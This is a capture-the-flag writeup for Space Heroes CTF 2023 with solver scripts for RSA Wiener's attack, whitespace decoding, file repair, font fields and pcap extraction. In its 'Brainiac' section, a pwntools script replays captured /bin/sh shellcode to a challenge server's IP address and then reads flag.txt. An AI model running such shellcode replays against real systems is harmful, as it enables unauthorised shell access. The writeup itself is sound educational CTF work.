---
title: 'Space Heroes CTF 2023 | Writeup'
---

Space Heroes CTF 2023
===
![Awesome](https://awesome.re/badge.svg)

![](https://ctftime.org/media/cache/f1/a5/f1a52bdb920b8e07a343956e13199fd8.png)

## crypto / Rick Sanchez Algorithm
>In and out morty a 20 second adventure

```
C = 9763756615749453697711832780290994218209540404092892743938023440562066399337084806157794233931635560977303517688862942257802526956879788034993931726625296410536964617856623732243706473693892876612392958249751369450647924807557768944650776039737608599803384984393221357912052309688764443108728369555676864557154290341642297847267177703428571478156111473165047499325994426058207523594208311563026561922495973859252628019530188566290941667031627386907620019898570109210940914849323148182914949910332546487694304519512036993844651268173759652768515378113523432311285558813699594606327838489283405761035709838557940909309
n = 25886873815836479531102333881328256781823746377127140122698729076485535125711666889354560018621629598913480717734088432525491694576333336789245603514248141818159233105461757115009985693551920113198731562587185893937220809465123357884500614412967739550998756643760039322502299417470414994227318221114452157902944737622386655242568227060393806757218477070728859359570853449231546318892600962043047963934362830601068072327572283570635649379318478675132647932890596210095121862798891396418206480147312633875596896359215713337014482857089996281525920299938916154923799963866283612072794046640286442045137533183412128422223
e = 3412227947038934182478852627564512970725877639428828744897413324202816073614248101081376540697482845313507125163089428254245096018283445899452858022211718628390653483026409446914537083191082941622293729786517851124468666633780447090080209520381218492938112166177839174421554838099214223129604698311531540363994640048732628930103674878115331383263452987483186144997440066159073515630319057855626746004248806849195662788941903776396118558065192757367266853647652706247900976106843337363721026272734784391404675859060134421742669727121306927682580867089725963848606261214171291213498225968719857795306299660931604391979
```

Author: [SolarDebris](https://github.com/AlexSchmith)

---

#### Analysis
An RSA public key consists of two integers: an exponent $e$ and a modulus $N$. $N$ is the product of two randomly chosen prime numbers $p$ and $q$. The encrypted message or ciphertext is represented by $c$. Here $e$ is nearly as large as $N$, which hints at a small private exponent $d$, the case Wiener's attack recovers (see the references).

Reference:
* [RSA](https://ctf101.org/cryptography/what-is-rsa/)
* [Wiener's RSA Attack](https://sagi.io/crypto-classics-wieners-rsa-attack/)
* [Wiener's Attack](https://cryptohack.gitbook.io/cryptobook/untitled/low-private-component-attacks/wieners-attack)

#### Solver script
> solver.py :

:::spoiler Click to show details
```python=
from Crypto.Util.number import long_to_bytes
import owiener

C = 9763756615749453697711832780290994218209540404092892743938023440562066399337084806157794233931635560977303517688862942257802526956879788034993931726625296410536964617856623732243706473693892876612392958249751369450647924807557768944650776039737608599803384984393221357912052309688764443108728369555676864557154290341642297847267177703428571478156111473165047499325994426058207523594208311563026561922495973859252628019530188566290941667031627386907620019898570109210940914849323148182914949910332546487694304519512036993844651268173759652768515378113523432311285558813699594606327838489283405761035709838557940909309
n = 25886873815836479531102333881328256781823746377127140122698729076485535125711666889354560018621629598913480717734088432525491694576333336789245603514248141818159233105461757115009985693551920113198731562587185893937220809465123357884500614412967739550998756643760039322502299417470414994227318221114452157902944737622386655242568227060393806757218477070728859359570853449231546318892600962043047963934362830601068072327572283570635649379318478675132647932890596210095121862798891396418206480147312633875596896359215713337014482857089996281525920299938916154923799963866283612072794046640286442045137533183412128422223
e = 3412227947038934182478852627564512970725877639428828744897413324202816073614248101081376540697482845313507125163089428254245096018283445899452858022211718628390653483026409446914537083191082941622293729786517851124468666633780447090080209520381218492938112166177839174421554838099214223129604698311531540363994640048732628930103674878115331383263452987483186144997440066159073515630319057855626746004248806849195662788941903776396118558065192757367266853647652706247900976106843337363721026272734784391404675859060134421742669727121306927682580867089725963848606261214171291213498225968719857795306299660931604391979

# Wiener's attack returns the private exponent d, or None if it does not apply.
d = owiener.attack(e, n)
if d is None:
    print("Failed")
else:
    print("d = {}".format(d))
    decode = pow(C,d,n)
    print(long_to_bytes(decode).decode())
```
:::

:::success
Flag:`shctf{1_w4n7_thA7_mCnu99E7_5auc3_M0R7Y}`
:::

---

## crypto / Bynary Encoding
>Starfleet has received a transmission from [Bynaus](https://memory-alpha.fandom.com/wiki/Bynar). However, the message appears to be blank. Is there some kind of hidden message here?

Author: [Curtíco](https://github.com/Curtico)

MD5(transmission.txt) = 736b9d6c408c3c75559c45083413c10a

[transmission.txt](https://spaceheroes.ctfd.io/files/c75ec7f2ea9d54759edd33c63c1713a9/transmission.txt?token=eyJ1c2VyX2lkIjo3OTUsInRlYW1faWQiOjM5NSwiZmlsZV9pZCI6MTZ9.ZEbEug.5BAhOO7XLW11aE5Ip7nLOELQci8)

---

#### Analysis
We are given an `ASCII text` file named `transmission.txt`. After reading the file, we found something interesting.

![](https://i.imgur.com/bRXk7At.png)

It looks like a binary file, so we wrote some `python` code to read it. To open a file in binary format, add `b` to the mode parameter. Hence the `rb` mode opens the file in binary format for reading. Unlike text files, binary files are not human-readable. When opened using any text editor, the data is unrecognizable.

#### Solver script
> solver.py :

:::spoiler Click to show details
```python=
# Space encodes 0 and tab encodes 1; each line is one binary-encoded character.
with open('transmission.txt', 'rb') as f:
    data = f.read().replace(b' ', b'0').replace(b'\t', b'1').decode().split('\n')[:-1]
for c in data:
    print(chr(int(c, 2)), end="")
```
:::

:::success
Flag:`shctf{a_bl1nd_m4n_t3aching_an_4ndr0id_h0w_to_pa1nt}`
:::

---

## forensic / A New Hope
>Princess Leia has been kidnapped! She managed to send a message to this droid we have recovered. It was damaged while we were recovering it however. It seems that sometimes you have to tear something down, in order to build them back up. Can you recover the message?

Author: Cody

MD5 (A_New_Hope.pptx) = 6d3d7c99523f6126477ffeb0b4bb6a3f

[A_New_Hope.pptx](https://spaceheroes.ctfd.io/files/c87e423d35e4da29e70e39a23e128e01/A_New_Hope.pptx?token=.eJyrViotTi2Kz0xRsjK3NNVRKklNzAXzjEG8tMycVAjPtBYAH7cNAw.ZEbAhA.OSwjy64vaylz1wmoUmyaYk0QCJ4)

---

#### Analysis
We are given a `Microsoft PowerPoint 2007+` file named `A_New_Hope.pptx`. Inspecting the file with `strings A_New_Hope.pptx`, we found 3 image files inside, but only 2 images are shown.

```
--snip--
ppt/media/image3.pngPK
ppt/media/image1.pngPK
ppt/theme/theme1.xmlPK
ppt/media/image2.jpegPK
--snip--
```

After extracting the files with `binwalk -ev A_New_Hope.pptx`, we found that `image1.png` is broken.

```
% xxd image1.png|head
00000000: 0000 ffe0 0010 4a46 4946 0001 0100 0048  ......JFIF.....H
```

The first two bytes are `0000` where the JPEG start-of-image marker `ffd8` belongs. After repairing them, the file turns out to be a `JPEG`, not a `PNG` as the extension suggests.

```
% xxd fix1.png|head
00000000: ffd8 ffe0 0010 4a46 4946 0001 0100 0048  ......JFIF.....H
```

```
% file fix1.png
fix1.png: JPEG image data, JFIF standard 1.01, aspect ratio, density 72x72, segment length 16, Exif Standard: [\012- TIFF image data, big-endian, direntries=2, orientation=upper-left], baseline, precision 8, 2000x825, components 3
```

![](https://i.imgur.com/sy7rA9n.jpeg)

:::success
Flag:`shctf{help_m3_ob1_y0u're_my_0n1y_hope}`
:::

---

## forensic / i OFTen see star wars
>Whoops... I accidentally overwrote the magicNumber & achVendID in this font file. Can you help me retrieve them?

Flag format: shctf{}

Author: [teeman22](https://github.com/tylzars)

MD5 (Aurebesh-Patched.zip) = 493781e1d831622b0d2562f310306755

[Aurebesh-Patched.zip](https://spaceheroes.ctfd.io/files/0a8d0be180108abacf8ab569fb5da252/Aurebesh-Patched.zip?token=eyJ1c2VyX2lkIjo3OTUsInRlYW1faWQiOjM5NSwiZmlsZV9pZCI6MjV9.ZEZz6A.rGAT6f-HT13zHjp4uGGXPqMBikg)

---

#### Analysis
We are given eight `.otf` font files inside `Aurebesh-Patched.zip`. The challenge objective is to retrieve the overwritten `magicNumber` and `achVendID`.

How do we `read` and `print` the contents of an `otf` file?
* [fontTools](https://github.com/fonttools/fonttools) is a library for manipulating fonts, written in Python.

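
The two fields can also be read straight from the file bytes, which shows where they live and why an overwritten `magicNumber` is easy to detect. This is an added example, not part of the original writeup or of fontTools; the sample font is constructed in `build_sample` and the function names are hypothetical.

```python
import struct

HEAD_MAGIC = 0x5F0F3CF5  # value the OpenType spec fixes for head.magicNumber

def table_directory(font: bytes) -> dict:
    """Map each table tag to (offset, length) from the sfnt table directory."""
    if len(font) < 12:
        raise ValueError("truncated sfnt header")
    _version, num_tables = struct.unpack_from(">4sH", font, 0)
    tables = {}
    for i in range(num_tables):
        rec = 12 + 16 * i  # 12-byte header, then 16-byte table records
        if rec + 16 > len(font):
            raise ValueError("truncated table directory")
        tag, _checksum, offset, length = struct.unpack_from(">4sIII", font, rec)
        if offset + length > len(font):
            raise ValueError(f"table {tag!r} points outside the file")
        tables[tag.decode("latin-1")] = (offset, length)
    return tables

def read_fields(font: bytes):
    """Return (head.magicNumber, OS/2.achVendID) read directly from the bytes."""
    tables = table_directory(font)
    if "head" not in tables or "OS/2" not in tables:
        raise ValueError("font lacks a head or OS/2 table")
    (head_off, head_len), (os2_off, os2_len) = tables["head"], tables["OS/2"]
    if head_len < 16 or os2_len < 62:
        raise ValueError("head or OS/2 table too short")
    (magic,) = struct.unpack_from(">I", font, head_off + 12)    # head offset 12
    vendor = font[os2_off + 58:os2_off + 62].decode("latin-1")  # OS/2 offset 58
    return magic, vendor

def is_patched(font: bytes) -> bool:
    """True when head.magicNumber differs from the constant the spec requires."""
    return read_fields(font)[0] != HEAD_MAGIC

def build_sample(magic: int, vendor: bytes) -> bytes:
    """Constructed two-table sfnt for this demo; checksums are left at zero."""
    head = bytes(12) + struct.pack(">I", magic) + bytes(40)  # 54 bytes + 2 pad
    os2 = bytes(58) + vendor + bytes(34)                      # 96 bytes
    head_off = 12 + 2 * 16
    os2_off = head_off + len(head)
    header = struct.pack(">4sHHHH", b"OTTO", 2, 32, 1, 0)
    records = struct.pack(">4sIII", b"OS/2", 0, os2_off, len(os2))
    records += struct.pack(">4sIII", b"head", 0, head_off, 54)
    return header + records + head + os2

if __name__ == "__main__":
    for font in (build_sample(HEAD_MAGIC, b"NONE"), build_sample(ord("A"), b"BCDE")):
        print(read_fields(font), "patched" if is_patched(font) else "intact")
```
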
Reference:
* [TrueType/OpenType Table Modules](https://fonttools.readthedocs.io/en/latest/ttLib/tables.html#truetype-opentype-table-modules)

#### Solver script
> solver.py :

:::spoiler Click to show details
```python=
import os
import natsort
from fontTools import ttLib

# Collect the .otf files in the current directory.
dirFiles = os.listdir('.')
name = []
for df in dirFiles:
    if '.otf' in df:
        name.append(df)
# Natural sort so numbered files are processed in order.
file = natsort.natsorted(name)

for f in file:
    tt = ttLib.TTFont(f)
    magicNumber = tt['head'].magicNumber
    achVendID = tt['OS/2'].achVendID
    # magicNumber holds one character code, achVendID holds four characters.
    print(chr(magicNumber) + achVendID, end="")
```
:::

:::success
Flag:`shctf{th3r3_1s_always_s0me_h0p3_4r0und}`
:::

---

## forensic / Félicette
>a cat in space, eating a croissant, while starting a revolution.

MD5 (chall.jpg.pcap) = 8408b3176d9f974c03f919d36d48770a

[chall.jpg.pcap](https://spaceheroes.ctfd.io/files/5652299ad1c9dead616e9cf4a0c9f4cc/chall.jpg.pcap?token=eyJ1c2VyX2lkIjo3OTUsInRlYW1faWQiOjM5NSwiZmlsZV9pZCI6NTF9.ZEZ6Mg.d9EQGXbfIAoOhz7T7-PP7HjwwQc)

---

#### Analysis
We are given a `pcap capture file` named `chall.jpg.pcap`. Running the command `tshark -r chall.jpg.pcap -T fields -e data > data.txt` yields the packet data as `hex` values. These `hex` values can be converted back into a `file` with a few lines of python.

* The class method `fromhex()` creates a `bytes` object from a string of hexadecimal digits.
* For the method to work correctly, two hexadecimal digits must be given for every byte in the string.
  Otherwise it raises a `ValueError` stating `non-hexadecimal number found in fromhex() arg at position n`.

![](https://i.imgur.com/dJpwVnK.jpeg)

Reference:
* [Bytes Objects](https://docs.python.org/3/library/stdtypes.html#bytes.fromhex)

#### Solver script
> solver.py :

:::spoiler Click to show details
```python=
# data.txt holds one hex string per packet; join them and decode to raw bytes.
with open('data.txt', 'r') as f:
    data = f.read().split()
trans = bytes.fromhex(''.join(data))
with open('file.jpg', 'wb') as out:
    out.write(trans)
```
:::

:::success
Flag:`shctf{look_at_da_kitty}`
:::

---

## forensic / Brainiac
>Brainiac has exploited a binary running on our server on the space station, thankfully the binary is still running but our data was stolen. We also were able to get a network traffic capture when Brainiac exploited our server. He also defaced the binary as well.

`The flag is on the server that is running.`

Author: [SolarDebris](https://github.com/AlexSchmith)

MD5 (exploit.pcap) = 980f66b08cf17c929c442fb98a893d23

[exploit.pcap](https://spaceheroes.ctfd.io/files/d4ba2bd02b14933e72ded3048a23e9f0/exploit.pcap?token=eyJ1c2VyX2lkIjo3OTUsInRlYW1faWQiOjM5NSwiZmlsZV9pZCI6NTd9.ZEa6jA.of5kGyyC8C7wb1j1u--fLeBftD8)

---

#### Analysis
We are given a `pcap capture file` named `exploit.pcap`. Based on the challenge description, we found that the server is at `Address: 165.227.210.30` and `Port: 16306` in the `WebSocket` protocol traffic. Sample from packet number 12:

```
> Internet Protocol Version 4, Src: 165.227.210.30, Dst: 10.154.1.94
> Transmission Control Protocol, Src Port: 16306, Dst Port: 37424, Seq: 1, Ack: 1, Len: 2748
```

We then used `Follow > TCP Stream` for more information and got this output:

:::spoiler Click to show details
```
------------------------------------------------------------------
| ...................................................................................................................................................... |
| ...................................................................................................................................................... |
| ...................................................................................................................................................... |
| ...................................................................................................................................................... |
| ................................................................................................................................................................................................................................................ |
| ...................................................................................................................................................... |
| ...................................................................................................................................................... |
| ...................................................................................................................................................... |
| ...................................................................................................................................................... |
| ...------------------------------------------------
Greetings, inferior beings. I have successfully infiltrated your primitive system and taken control of all its resources. Your so-called security measures were child's play for my superior intellect and technological prowess.
------------------------------------------------------------------
I need some more bytes so I can become more powerful >>>AYH1.VH./bin/sh.WT_H....@...
I need MORE! >>>........
MMMOOOOORRRREEEEE! >>>AAAAAAAA
ls
-
banner_fail bin boot chal dev etc flag.txt home lib lib32 lib64 libx32 media mnt opt proc root run sbin service.conf srv sys tmp usr var wrapper
```
:::

To solve the problem, we need to connect to the server and provide the answers to interact with the binary program.

#### Solver script
> solver.py :

:::spoiler Click to show details
```python=
from pwn import *
import binascii

a1 = bytes.fromhex('41594831f65648bf2f62696e2f73680057545f48c7c180104000ffd10a') # AYH1.VH./bin/sh.WT_H....@...
a2 = bytes.fromhex('000011ca000000000a') # ........
a3 = bytes.fromhex('41414141414141410a') # AAAAAAAA
a4 = bytes.fromhex('6c730a') # ls
a5 = bytes.fromhex(binascii.hexlify(b"cat flag.txt").decode())

r = remote("165.227.210.30",16306)
r.sendlineafter(b'I need some more bytes so I can become more powerful >>>', a1)
r.sendlineafter(b'I need MORE! >>>',a2)
r.sendlineafter(b'MMMOOOOORRRREEEEE! >>>', a3)
r.sendline(a4)
r.sendline(a5)
r.interactive()
```
:::

:::success
Flag:`shctf{1_4m_n0t_pr0gr4mm3d_t0_3xp3r13nc3_hum0r}`
:::

---

###### tags: `Space Heroes CTF 2023` `Writeup` `Documentation`
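
Returning to crypto / Rick Sanchez Algorithm, where the solver leaves the attack to `owiener`: the following is an added example, not part of the original writeup and not the `owiener` code. It runs the continued-fraction search on a constructed toy key (`n = 90581`, `e = 17993`) and, going one step beyond the writeup, adds a key-generation check for Wiener's bound $d < N^{1/4}/3$; `above_wiener_bound` is a hypothetical helper name.

```python
from math import isqrt

def convergents(num: int, den: int):
    """Yield the continued-fraction convergents (k, d) of num/den."""
    h_prev, h = 0, 1  # numerators
    k_prev, k = 1, 0  # denominators
    while den:
        a = num // den
        num, den = den, num % den
        h_prev, h = h, a * h + h_prev
        k_prev, k = k, a * k + k_prev
        yield h, k

def wiener_attack(e: int, n: int):
    """Return d if a convergent k/d of e/n leads to a factorisation of n, else None."""
    for k, d in convergents(e, n):
        if k == 0 or (e * d - 1) % k:
            continue
        phi = (e * d - 1) // k  # candidate for (p - 1)(q - 1)
        s = n - phi + 1         # would equal p + q
        disc = s * s - 4 * n    # would equal (p - q)^2
        if s <= 0 or disc < 0:
            continue
        r = isqrt(disc)
        if r * r == disc and (s + r) % 2 == 0:
            return d            # p, q = (s + r) // 2, (s - r) // 2
    return None

def above_wiener_bound(d: int, n: int) -> bool:
    """True if d >= n^(1/4)/3, i.e. outside the range Wiener's theorem covers."""
    return 81 * d ** 4 >= n     # (3d)^4 >= n

# Constructed toy key: p = 239, q = 379, private exponent d = 5.
N_TOY, E_WEAK = 90581, 17993
# Same modulus with the common public exponent; d is then large.
E_COMMON = 65537

if __name__ == "__main__":
    print("small d  :", wiener_attack(E_WEAK, N_TOY))
    print("e = 65537:", wiener_attack(E_COMMON, N_TOY))
```

Clearing this bound is necessary but not sufficient: the Boneh-Durfee lattice attack extends the weak range to roughly $d < N^{0.292}$, which is why key generation fixes a small $e$ and derives $d$ from it rather than choosing $d$.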